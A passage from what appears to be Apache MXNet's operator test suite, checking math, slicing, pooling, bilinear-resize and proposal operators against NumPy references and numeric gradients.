lambda x: 1. / (1. - x ** 2),
-0.95, 0.95],
'cbrt': [lambda x: mx.sym.cbrt(x),
lambda x: np.cbrt(x),
lambda x: 1. / (3. * np.cbrt(x) ** 2),
-10.0, 10.0],
'cos': [lambda x: mx.sym.cos(x),
lambda x: np.cos(x),
lambda x: -np.sin(x),
-5.0, 5.0],
'cosh': [lambda x: mx.sym.cosh(x),
lambda x: np.cosh(x),
lambda x: np.sinh(x),
-2.0, 2.0],
'exp': [lambda x: mx.sym.exp(x),
lambda x: np.exp(x),
lambda x: np.exp(x),
-4.0, 4.0],
'expm1': [lambda x: mx.sym.expm1(x),
lambda x: np.expm1(x),
lambda x: np.exp(x),
-0.1, 0.1],
'log': [lambda x: mx.sym.log(x),
lambda x: np.log(x),
lambda x: 1. / x,
0.01, 100.0],
'log10': [lambda x: mx.sym.log10(x),
lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)),
0.01, 100.0],
'log2': [lambda x: mx.sym.log2(x),
lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)),
0.01, 100.0],
'log1p': [lambda x: mx.sym.log1p(x),
lambda x: np.log1p(x),
lambda x: 1. / (1. + x),
-0.1, 0.1],
'rcbrt': [lambda x: mx.sym.rcbrt(x),
lambda x: 1. / np.cbrt(x),
lambda x: -1. / (3. * x * np.cbrt(x)),
0.01, 100.0],
'reciprocal': [lambda x: mx.sym.reciprocal(x),
lambda x: 1. / x,
lambda x: -1. / (x ** 2),
0.01, 100.0],
'relu': [lambda x: mx.sym.relu(x),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'rsqrt': [lambda x: mx.sym.rsqrt(x),
lambda x: 1. / np.sqrt(x),
lambda x: -0.5 / (x * np.sqrt(x)),
0.01, 100.0],
'sigmoid': [lambda x: mx.sym.sigmoid(x),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.softsign(x),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
'sin': [lambda x: mx.sym.sin(x),
lambda x: np.sin(x),
lambda x: np.cos(x),
-5.0, 5.0],
'sinh': [lambda x: mx.sym.sinh(x),
lambda x: np.sinh(x),
lambda x: np.cosh(x),
-2.0, 2.0],
'sqrt': [lambda x: mx.sym.sqrt(x),
lambda x: np.sqrt(x),
lambda x: 0.5 / np.sqrt(x),
0.01, 100.0],
'tan': [lambda x: mx.sym.tan(x),
lambda x: np.tan(x),
lambda x: np.tan(x) ** 2 + 1.,
-1.5, 1.5],
'tanh': [lambda x: mx.sym.tanh(x),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'smooth_l1_sig1': [lambda x: mx.sym.smooth_l1(x, scalar=1.),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig_default': [lambda x: mx.sym.smooth_l1(x),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig2': [lambda x: mx.sym.smooth_l1(x, scalar=2.),
lambda x: np_smooth_l1(x, 2.),
lambda x: np_smooth_l1_grad(x, 2.),
-1.0, 1.0]
}
if have_scipy:
unary_ops['gamma'] = [lambda x: mx.sym.gamma(x),
lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x),
0.01, 5.0]
unary_ops['gammaln'] = [lambda x: mx.sym.gammaln(x),
lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x),
0.01, 20.0]
# Loop over operators
for name, op in unary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
if name == 'gammaln' or name == 'gamma':
rtol = rtol_less_l[ind]
atol = atol_less_l[ind]
else:
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
def compare_forw_backw_binary_op(
name, forward_mxnet_call, forward_numpy_call,
backward1_numpy_call, backward2_numpy_call, shape, input1_low,
input1_high, input2_low, input2_high, rtol, atol, dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
data1 = mx.symbol.Variable(op_name + '_data1', dtype=dtype)
data2 = mx.symbol.Variable(op_name + '_data2', dtype=dtype)
# Comparison: Forward expression
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
res_np = forward_numpy_call(data1_np, data2_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_fw(op_ex, [data1_np, data2_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data1_grad = backward1_numpy_call(data1_np, data2_np) * res_grad
data2_grad = backward2_numpy_call(data1_np, data2_np) * res_grad
check_bw(op_ex, [data1_np, data2_np], [res_grad], [data1_grad, data2_grad])
def finite_diff_binary_op(
name, forward_mxnet_call, shape, input1_low, input1_high, input2_low,
input2_high, rtol, atol, num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
data1 = mx.symbol.Variable('data1', dtype=dtype)
data2 = mx.symbol.Variable('data2', dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_grad(op_ex, [data1_np, data2_np])
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
def test_binary_math_operators():
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
binary_ops = {
'hypot' : [lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
-5.0, 5.0, -5.0, 5.0],
'pow': [lambda x, y: mx.sym.pow(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0],
'power': [lambda x, y: mx.sym.power(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0]
}
# Loop over operators
for name, op in binary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
compare_forw_backw_binary_op(
name, op[0], op[1], op[2], op[3], shape, op[4], op[5], op[6],
op[7], rtol_l[ind], atol_l[ind], dtype)
# Finite difference testing
finite_diff_binary_op(
name, op[0], shape, op[4], op[5], op[6], op[7], rtol_fd, atol_fd,
num_eps)
@pytest.mark.serial
def test_slice():
def test_slice_forward_backward(a, index):
a_np = a.asnumpy()
begin = []
end = []
step = []
for slice_i in index:
begin.append(slice_i.start)
end.append(slice_i.stop)
step.append(slice_i.step)
b = mx.nd.slice(a, begin=begin, end=end, step=step)
b_np = a_np[index]
assert same(b.asnumpy(), b_np)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=begin, end=end, step=step)
expected_in_grad = np.zeros_like(a_np)
expected_in_grad[index] = b_np
check_symbolic_backward(slice_sym, [a_np], [b_np], [expected_in_grad])
shape = (16, 14, 17, 20)
arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
index_list = [(slice(None),), (slice(None), slice(None)), (slice(1, 10),), (slice(1, 10), slice(3, 9)),
(slice(1, 10), slice(2, 5), slice(3, 6), slice(7, 10)),
(slice(1, 10, 2), slice(2, 9, 3), slice(3, 6, 5), slice(7, 10, 2)),
(slice(None, None, -1), slice(None, None, -1), slice(None, None, -1)),
(slice(10, 0, -2), slice(5, 2, -1), slice(7, None, 3), slice(None, 12, 4))]
for index in index_list:
test_slice_forward_backward(arr, index)
# check numeric gradient
in_data = np.arange(36).reshape(2, 2, 3, 3)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=[0, None], end=[1, None], step=[2, -1])
check_numeric_gradient(slice_sym, [in_data])
def test_slice_partial_infer():
def check_slice_partial_infer(data, begin, end, step, expected_out_shape):
out = mx.sym.slice(data, begin=begin, end=end, step=step)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
def check_slice_axis_partial_infer(data, axis, begin, end, expected_out_shape):
out = mx.sym.slice_axis(data, axis=axis, begin=begin, end=end)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
var1 = mx.sym.var(name="data", shape=(0, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (0, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (0, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (0, 3))
var1 = mx.sym.var(name="data", shape=(10, 0))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, 0))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, 0))
with mx.np_shape():
var1 = mx.sym.var(name="data", shape=(-1, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (-1, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (-1, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (-1, 3))
var1 = mx.sym.var(name='data', shape=(10, -1))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, -1))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, -1))
def test_float16_min_max():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/9007"""
a = mx.nd.array([np.finfo('float16').min, np.finfo('float16').max], dtype='float16')
assert a.dtype == np.float16
assert np.finfo('float16').min == mx.nd.min(a).asscalar()
assert np.finfo('float16').max == mx.nd.max(a).asscalar()
@mx.use_np_shape
def test_zero_size_min_max():
def min():
a = mx.nd.zeros(shape=(5, 0))
a.min()
def max():
a = mx.nd.zeros(shape=(5, 0))
a.max()
pytest.raises(MXNetError, min)
pytest.raises(MXNetError, max)
def test_squeeze_op():
def check_squeeze_op(shape, axis=None):
data = mx.nd.random.uniform(low=-10.0, high=10.0, shape=shape)
if axis is None:
out = mx.nd.squeeze(data).asnumpy()
out_expected = np.squeeze(data.asnumpy())
else:
out = mx.nd.squeeze(data, axis=axis).asnumpy()
out_expected = np.squeeze(data.asnumpy(), axis=axis)
if out.shape == (1,): # as an exception (1, 1, 1) will be squeezed to (1,)
out_expected = np.squeeze(data.asnumpy(), axis=tuple([i for i in range(1, len(shape))]))
assert same(out, out_expected)
# check forward
check_squeeze_op((1, 5, 1, 3, 1), 0)
check_squeeze_op((1, 5, 1, 3, 1), 2)
check_squeeze_op((1, 5, 1, 3, 1), 4)
check_squeeze_op((1, 5, 1, 3, 1), (0, 4))
check_squeeze_op((1, 5, 1, 3, 1), (0, 2, 4))
check_squeeze_op((1, 5, 1, 3, 1))
check_squeeze_op((1, 1, 1, 1))
# check gradient
data = mx.symbol.Variable('data')
shape = (1, 2, 1, 3, 1)
data_tmp = np.ones(shape)
test = mx.sym.squeeze(data)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=2)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=(2, 4))
check_numeric_gradient(test, [data_tmp])
@pytest.mark.serial
def test_adaptive_avg_pool_op():
def py_adaptive_avg_pool(x, height, width):
# 2D per frame adaptive avg pool
def adaptive_avg_pool_frame(x, y):
isizeH, isizeW = x.shape
osizeH, osizeW = y.shape
for oh in range(osizeH):
istartH = int(np.floor(1.0 * (oh * isizeH) / osizeH))
iendH = int(np.ceil(1.0 * (oh + 1) * isizeH / osizeH))
kH = iendH - istartH
for ow in range(osizeW):
istartW = int(np.floor(1.0 * (ow * isizeW) / osizeW))
iendW = int(np.ceil(1.0 * (ow + 1) * isizeW / osizeW))
kW = iendW - istartW
xsum = 0
for ih in range(kH):
for iw in range(kW):
xsum += x[istartH+ih][istartW+iw]
y[oh][ow] = xsum / kH / kW
B,C,_,_ = x.shape
y = np.empty([B,C,height, width], dtype=x.dtype)
for b in range(B):
for c in range(C):
adaptive_avg_pool_frame(x[b][c], y[b][c])
return y
def check_adaptive_avg_pool_op(shape, output_height, output_width=None):
x = mx.nd.random.uniform(shape=shape)
if output_width is None:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=output_height)
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_height)
else:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=(output_height, output_width))
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_width)
assert_almost_equal(y.asnumpy(), npy)
shape = (2, 2, 10, 10)
for i in range(1, 11):
check_adaptive_avg_pool_op(shape, i)
for j in range(1, 11):
check_adaptive_avg_pool_op(shape, i, j)
def test_bilinear_resize_op():
def py_bilinear_resize(x, outputHeight, outputWidth):
batch, channel, inputHeight, inputWidth = x.shape
if outputHeight == inputHeight and outputWidth == inputWidth:
return x
y = np.empty([batch, channel, outputHeight, outputWidth])
rheight = 1.0 * (inputHeight - 1) / (outputHeight - 1) if outputHeight > 1 else 0.0
rwidth = 1.0 * (inputWidth - 1) / (outputWidth - 1) if outputWidth > 1 else 0.0
for h2 in range(outputHeight):
h1r = 1.0 * h2 * rheight
h1 = int(np.floor(h1r))
h1lambda = h1r - h1
h1p = 1 if h1 < (inputHeight - 1) else 0
for w2 in range(outputWidth):
w1r = 1.0 * w2 * rwidth
w1 = int(np.floor(w1r))
w1lambda = w1r - w1
w1p = 1 if w1 < (inputWidth - 1) else 0
for b in range(batch):
for c in range(channel):
y[b][c][h2][w2] = (1-h1lambda)*((1-w1lambda)*x[b][c][h1][w1] + \
w1lambda*x[b][c][h1][w1+w1p]) + \
h1lambda*((1-w1lambda)*x[b][c][h1+h1p][w1] + \
w1lambda*x[b][c][h1+h1p][w1+w1p])
return y
def py_bilinear_resize_backward(x, incoming_grads, mode='size'):
data1 = np.zeros_like(x)
data2 = incoming_grads
batchsize = data1.shape[0]
channels = data1.shape[1]
height1 = data1.shape[2]
width1 = data1.shape[3]
height2 = data2.shape[2]
width2 = data2.shape[3]
rheight = float(height1 - 1) / (height2 - 1) if (height2 > 1) else 0
rwidth = float(width1 - 1) / (width2 - 1) if (width2 > 1) else 0
# special case: just copy
if height1 == height2 and width1 == width2:
data1 += data2
return [data1]
for h2 in range(0, height2):
for w2 in range(0, width2):
h1r = rheight * h2
h1 = int(h1r)
h1p = 1 if (h1 < height1 - 1) else 0
h1lambda = h1r - h1
h0lambda = 1 - h1lambda
#
w1r = rwidth * w2
w1 = int(w1r)
w1p = 1 if (w1 < width1 - 1) else 0
w1lambda = w1r - w1
w0lambda = 1 - w1lambda
#
for n in range(0, batchsize):
for c in range(0, channels):
d2val = data2[n][c][h2][w2]
data1[n][c][h1][w1] += h0lambda * w0lambda * d2val
data1[n][c][h1][w1 + w1p] += h0lambda * w1lambda * d2val
data1[n][c][h1 + h1p][w1] += h1lambda * w0lambda * d2val
data1[n][c][h1 + h1p][w1 + w1p] += h1lambda * w1lambda * d2val
if mode == 'like':
return data1, np.zeros_like(incoming_grads)
return [data1]
def check_bilinear_resize_op(shape, height, width):
x = mx.nd.random.uniform(shape=shape)
y = mx.nd.contrib.BilinearResize2D(x, height=height, width=width)
assert_almost_equal(y, py_bilinear_resize(x.asnumpy(), height, width))
x_scale = width / shape[-1]
y_scale = height / shape[-2]
y = mx.nd.contrib.BilinearResize2D(x, scale_height=y_scale, scale_width=x_scale)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
def check_bilinear_resize_align_corners_op():
img_shape = [1, 1, 3, 2]
data = [64, 32, 32, 64, 50, 100]
target_height = 6
target_width = 4
expected_data = {}
# align_corners = False
expected_data[0] = [
64.000, 56.000, 40.000, 32.000, 56.000, 52.000, 44.000, 40.000, 40.000, 44.000, 52.000, 56.000,
36.500, 45.625, 63.875, 73.000, 45.500, 56.875, 79.625, 91.000, 50.000, 62.500, 87.500, 100.000
]
# align_corners = True
expected_data[1] = [
64.000, 53.333, 42.667, 32.000, 51.200, 49.067, 46.933, 44.800, 38.400, 44.800, 51.200, 57.600,
35.600, 47.467, 59.333, 71.200, 42.800, 57.067, 71.333, 85.600, 50.000, 66.667, 83.333, 100.000
]
x = np.array(data, dtype=np.float32).reshape(img_shape)
x_nd = mx.nd.array(x)
y0 = np.array(expected_data[0]).reshape((1, 1, target_height, target_width))
y0_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=False)
assert_almost_equal(y0, y0_nd.asnumpy(), atol=1e-3)
y1 = np.array(expected_data[1]).reshape((1, 1, target_height, target_width))
y1_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=True)
assert_almost_equal(y1, y1_nd.asnumpy(), atol=1e-3)
def check_bilinear_resize_modes_op(shape, scale_height=None, scale_width=None, shape_1=None, mode=None):
x = mx.nd.random.uniform(shape=shape)
original_h = shape[2]
original_w = shape[3]
if mode == 'odd_scale':
assert scale_height is not None and scale_width is not None
new_h = int(original_h * scale_height) if (original_h % 2) == 0 else \
int((original_h - 1) * scale_height) + 1
new_w = int(original_w * scale_width) if (original_w % 2) == 0 \
else int((original_w - 1) * scale_width) + 1
y = mx.nd.contrib.BilinearResize2D(x, scale_height=scale_height,
scale_width=scale_width,
mode='odd_scale')
elif mode == 'to_even_down':
new_h = original_h if (original_h % 2) == 0 else original_h - 1
new_w = original_w if (original_w % 2) == 0 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_down')
elif mode == 'to_even_up':
new_h = original_h if (original_h % 2) == 0 else original_h + 1
new_w = original_w if (original_w % 2) == 0 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_up')
elif mode == 'to_odd_down':
new_h = original_h if (original_h % 2) == 1 else original_h - 1
new_w = original_w if (original_w % 2) == 1 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_down')
elif mode == 'to_odd_up':
new_h = original_h if (original_h % 2) == 1 else original_h + 1
new_w = original_w if (original_w % 2) == 1 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_up')
elif mode == 'like':
x_1 = mx.nd.random.uniform(shape=shape_1)
new_h = x_1.shape[2]
new_w = x_1.shape[3]
y = mx.nd.contrib.BilinearResize2D(x, x_1, mode='like')
new_shape_desired = np.array([shape[0], shape[1], new_h, new_w], dtype='int')
new_shape_got = np.array(y.shape, dtype='int')
data_sym = mx.sym.var('data')
data_np = x.asnumpy()
expected = py_bilinear_resize(data_np, new_h, new_w)
out_grads = np.ones([shape[0], shape[1], new_h, new_w])
expected_backward = py_bilinear_resize_backward(data_np, out_grads, mode)
assert_array_equal(new_shape_desired, new_shape_got, "Desired and got shapes are not equal. {} vs {}".format(
str(new_shape_desired.tolist()), str(new_shape_got.tolist())))
assert_almost_equal(y.asnumpy(), expected, 1e-3, 0)
if mode != 'like':
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, None, scale_height=scale_height, scale_width=scale_width, mode=mode)
check_symbolic_forward(resize_sym, [data_np], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np], rtol=1e-2, atol=1e-4)
else:
data_sym_like = mx.sym.var('data_like')
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, data_sym_like, mode=mode)
date_np_like = x_1.asnumpy()
check_symbolic_forward(resize_sym, [data_np, date_np_like], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np, date_np_like], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np, date_np_like], rtol=1e-2, atol=1e-4)
shape = (2, 2, 10, 10)
check_bilinear_resize_op(shape, 5, 5)
check_bilinear_resize_op(shape, 10, 10)
check_bilinear_resize_op(shape, 15, 15)
check_bilinear_resize_op(shape, 3, 7)
check_bilinear_resize_op(shape, 13, 17)
shape = (2, 2, 20, 20)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape = (2, 2, 21, 21)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape_0 = (2, 2, 21, 21)
shape_1 = (2, 2, 10, 10)
check_bilinear_resize_modes_op(shape_0, shape_1=shape_1, mode='like')
check_bilinear_resize_modes_op(shape_1, shape_1=shape_0, mode='like')
check_bilinear_resize_align_corners_op()
def test_multi_proposal_op():
# paramters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = 16
batch_size = 20
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = np.float32)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = np.float32)
im_info = mx.nd.empty((batch_size, 3), dtype = np.float32)
cls_prob = mx.nd.array(np.random.random(cls_prob.shape))
bbox_pred = mx.nd.array(np.random.random(bbox_pred.shape))
for i in range(batch_size):
im_size = np.random.randint(100, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(70, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
def get_sub(arr, i):
new_shape = list(arr.shape)
new_shape[0] = 1
res = arr[i].reshape(new_shape)
return res
def check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
single_proposal = []
single_score = []
for i in range(batch_size):
rois, score = mx.nd.contrib.Proposal(
cls_prob = get_sub(cls_prob, i),
bbox_pred = get_sub(bbox_pred, i),
im_info = get_sub(im_info, i),
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal.append(rois)
single_score.append(score)
multi_proposal, multi_score = mx.nd.contrib.MultiProposal(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal = mx.nd.stack(*single_proposal).reshape(multi_proposal.shape)
single_score = mx.nd.stack(*single_score).reshape(multi_score.shape)
single_proposal_np = single_proposal.asnumpy()
multi_proposal_np = multi_proposal.asnumpy()
single_score_np = single_score.asnumpy()
multi_score_np = multi_score.asnumpy()
# check rois x1,y1,x2,y2
assert np.allclose(single_proposal_np[:, 1:], multi_proposal_np[:, 1:])
# check rois batch_idx
for i in range(batch_size):
start = i * rpn_post_nms_top_n
end = start + rpn_post_nms_top_n
assert (multi_proposal_np[start:end, 0] == i).all()
# check score
assert np.allclose(single_score_np, multi_score_np)
def check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
im_info_sym = mx.sym.Variable('im_info')
cls_prob_sym = mx.sym.Variable('cls_prob')
bbox_pred_sym = mx.sym.Variable('bbox_pred')
sym = mx.sym.contrib.MultiProposal(
cls_prob = cls_prob_sym,
bbox_pred = bbox_pred_sym,
im_info = im_info_sym,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = False)
location = [cls_prob.asnumpy(), bbox_pred.asnumpy(), im_info.asnumpy()]
expected = [np.zeros_like(e) for e in location]
out_grads = [np.ones((rpn_post_nms_top_n, 5))]
check_symbolic_backward(sym, location, out_grads, expected)
check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
check_forward(rpn_pre_nms_top_n, 1500)
check_forward(1000, 500)
check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
def test_quadratic_function():
def f(x, a, b, c):
return a * x**2 + b * x + c
a = np.random.random_sample()
b = np.random.random_sample()
c = np.random.random_sample()
data = mx.symbol.Variable('data')
quad_sym = mx.sym.contrib.quadratic(data=data, a=a, b=b, c=c)
for dtype in [np.float16, np.float32, np.float64]:
tol = 1e-2 if dtype is np.float16 else 1e-5
for ndim in range(1, 6):
shape = rand_shape_nd(ndim, 5)
data_np = np.random.randn(*shape).astype(dtype)
expected = f(data_np, a, b, c)
backward_expected = 2 * a * data_np + b
# check imperative forward
output = mx.nd.contrib.quadratic(mx.nd.array(data_np), a=a, b=b, c=c)
assert_almost_equal(output, expected, rtol=tol, atol=tol)
# check forward
check_symbolic_forward(quad_sym, [data_np], [expected], rtol=tol, atol=tol)
# check backward
check_symbolic_backward(quad_sym, [data_np], [np.ones(expected.shape)],
[backward_expected], rtol=tol, atol=tol)
# check backward using finite difference
check_numeric_gradient(quad_sym, [data_np], atol=0.001)
def allclose_function(contexts):
def getRandom(base, percent = 1.):
return base * (1 + percent * (2 * np.random.random_sample() - 1.) / 100)
title = 'exp'
for ctx in contexts:
title += ' cpu' if ctx == mx.cpu() else ' gpu'
title += ' nElem shape'
num_ctx = len(contexts)
result = [False, False]
for dtype in [np.float16, np.float32, np.float64]:
rtol = getRandom(1e-2 if dtype is np.float16 else 1e-5)
atol = getRandom(1e-4 if dtype is np.float16 else 1e-7)
print('\nnumpy.{}: atol = {} rtol = {}'.format(dtype.__name__, atol, rtol))
print(title)
for ndim in range(1, 10):
shape = rand_shape_nd(ndim, 8)
a_np = np.random.randn(*shape).astype(dtype)
b_np = (a_np + np.random.randn(*shape).astype(dtype) / 10000000).astype(dtype)
expected = np.allclose(a_np, b_np, rtol, atol)
for n, ctx in enumerate(contexts):
a_ctx = mx.nd.array(a_np, dtype = dtype, ctx=ctx)
b_ctx = mx.nd.array(b_np, dtype = dtype, ctx=ctx)
output = mx.nd.contrib.allclose(a_ctx, b_ctx, rtol=rtol, atol=atol)
result[n] = output.asnumpy() == 1
if expected != result[n]:
# Preparing the output of elements of the array, which are considered as "not close" AND
# corresponding elements of comparison CPU/GPU/Python vectors, which are considered as "close"
v_ctx = 'CPU' if ctx == mx.cpu() else 'GPU'
if expected:
v_cmp = 'Python'
a_b = a_ctx.asnumpy()
b_b = b_ctx.asnumpy()
a_g = np.asarray(a_np)
b_g = np.asarray(b_np)
else:
v_cmp = v_ctx
v_ctx = 'Python'
a_b = np.asarray(a_np)
b_b = np.asarray(b_np)
a_g = a_ctx.asnumpy()
b_g = b_ctx.asnumpy()
print('\n *** Violations found on %s, but not on %s side ***' % (v_ctx, v_cmp))
frmt = " a[{0:d}]: b[{0:d}]:" \
" abs(a[{0:d}]-b[{0:d}]) - atol + rtol*abs(b[{0:d}]):"
# Define the indices of all violations and corresponding values of coordinates
bad_indexes = np.abs(a_b - b_b) >= atol + rtol * abs(b_b)
a_values = [a_b[bad_indexes], a_g[bad_indexes]]
